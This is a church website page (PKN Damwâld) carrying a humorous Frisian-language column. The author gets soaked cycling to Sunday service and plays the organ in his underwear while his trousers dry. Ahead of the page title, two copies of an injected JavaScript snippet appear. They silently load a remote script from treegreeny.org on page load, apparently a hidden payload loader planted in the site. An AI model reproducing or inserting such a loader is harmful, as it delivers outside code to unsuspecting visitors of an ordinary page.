;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Rein - PKN Damwâld

Rein

Gepubliceerd op: woensdag 17 februari 2021

It wie min waar doe’t ik dy sneintemoarns klear stie om nei tsjerke te gean.  “Soest net leaver mei de auto gean?”, waard my frege. Mar ik sei dat it wol wat tafalle soe. Mar it foel net ta. It reinde, sa’t men dat yn ’t Frysk sa moai seit, jonge katten. Ik wie it hiem amper ôf, doe wie ik al dweiltrochwiet.

Tagelyk mei suster A. sette ik myn fyts tsjin de muorre by tsjerke. Hja wie wizer west as ik en hie in paraplu opsetten en sa ridlik droech bleaun. Doe’t wy nei de tsjerkedoar rûnen fertelde se my dat se eartiids op skoalle in kear in tsien krige omt se it psalmferske sa goed opsizze koe. As beleanning krige se in plaatsje. Op dat plaatsje stie de tekst (yn ’t Hollânsk fansels, want doe’t suster A. lyts wie tochten se noch dat ús Leave Hear it  Frysk net ferstie) út de bergrede út Mattéus 5: “Hij doet zijn zon opgaan over bozen en goeden en zijn regen nederdalen op rechtvaardigen en onrechtvaardigen.”  Wat in moai begjin fan de snein: de tsjinst wie bûtendoar al begûn. Mear hoechde foar my eigentlik net, mar ik stie op it roaster om te spyljen, dus ik moast wol.

Mar spylje mei in wiete broek wol net sa goed. In oargelist spylet ek mei de fuotten en skoot dan soms op de oargelbank hinne en wer. Dy wiete broek makke dat knap lêstich. Doe’t de âlderling de meidylings die ha ik de wiete broek mar útlutsen, oer in bank hongen te droegjen en yn de ûnderbroek bin ik wer efter it oargel sitten gien. Der sieten gjin minsken op ‘e kreake, dus der wie nimmen dy’t it seach.

Ik ha wol tocht wat ús Leave Hear dêr no fan fyne soe. Tsjerkegongers rinne der wol faker by op in wize wêrt net in soad earbied foar de Ivige út blykt, mar in oargelist yn de ûnderbroek efter ’t oargel is wol eefkes wat oars. Mar ik fûn dat ik der neat oan dwaan koe. Ik hie it dochs net reine litten? En Hy soe dêr dochs de reden wol fan ynsjen? En miskien ek wol de humor.

Nei ôfrin fan de tsjinst ha ik my wer yn de ûnder de tsjinst wat opdroege broek wrongen en bin nei hûs fytst. Wer yn’e rein, mar wol op ‘e wize sa’t dat yn Hannelingen 8 sein wurdt fan de frjemdling út Etiopië: mei blydskip.

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns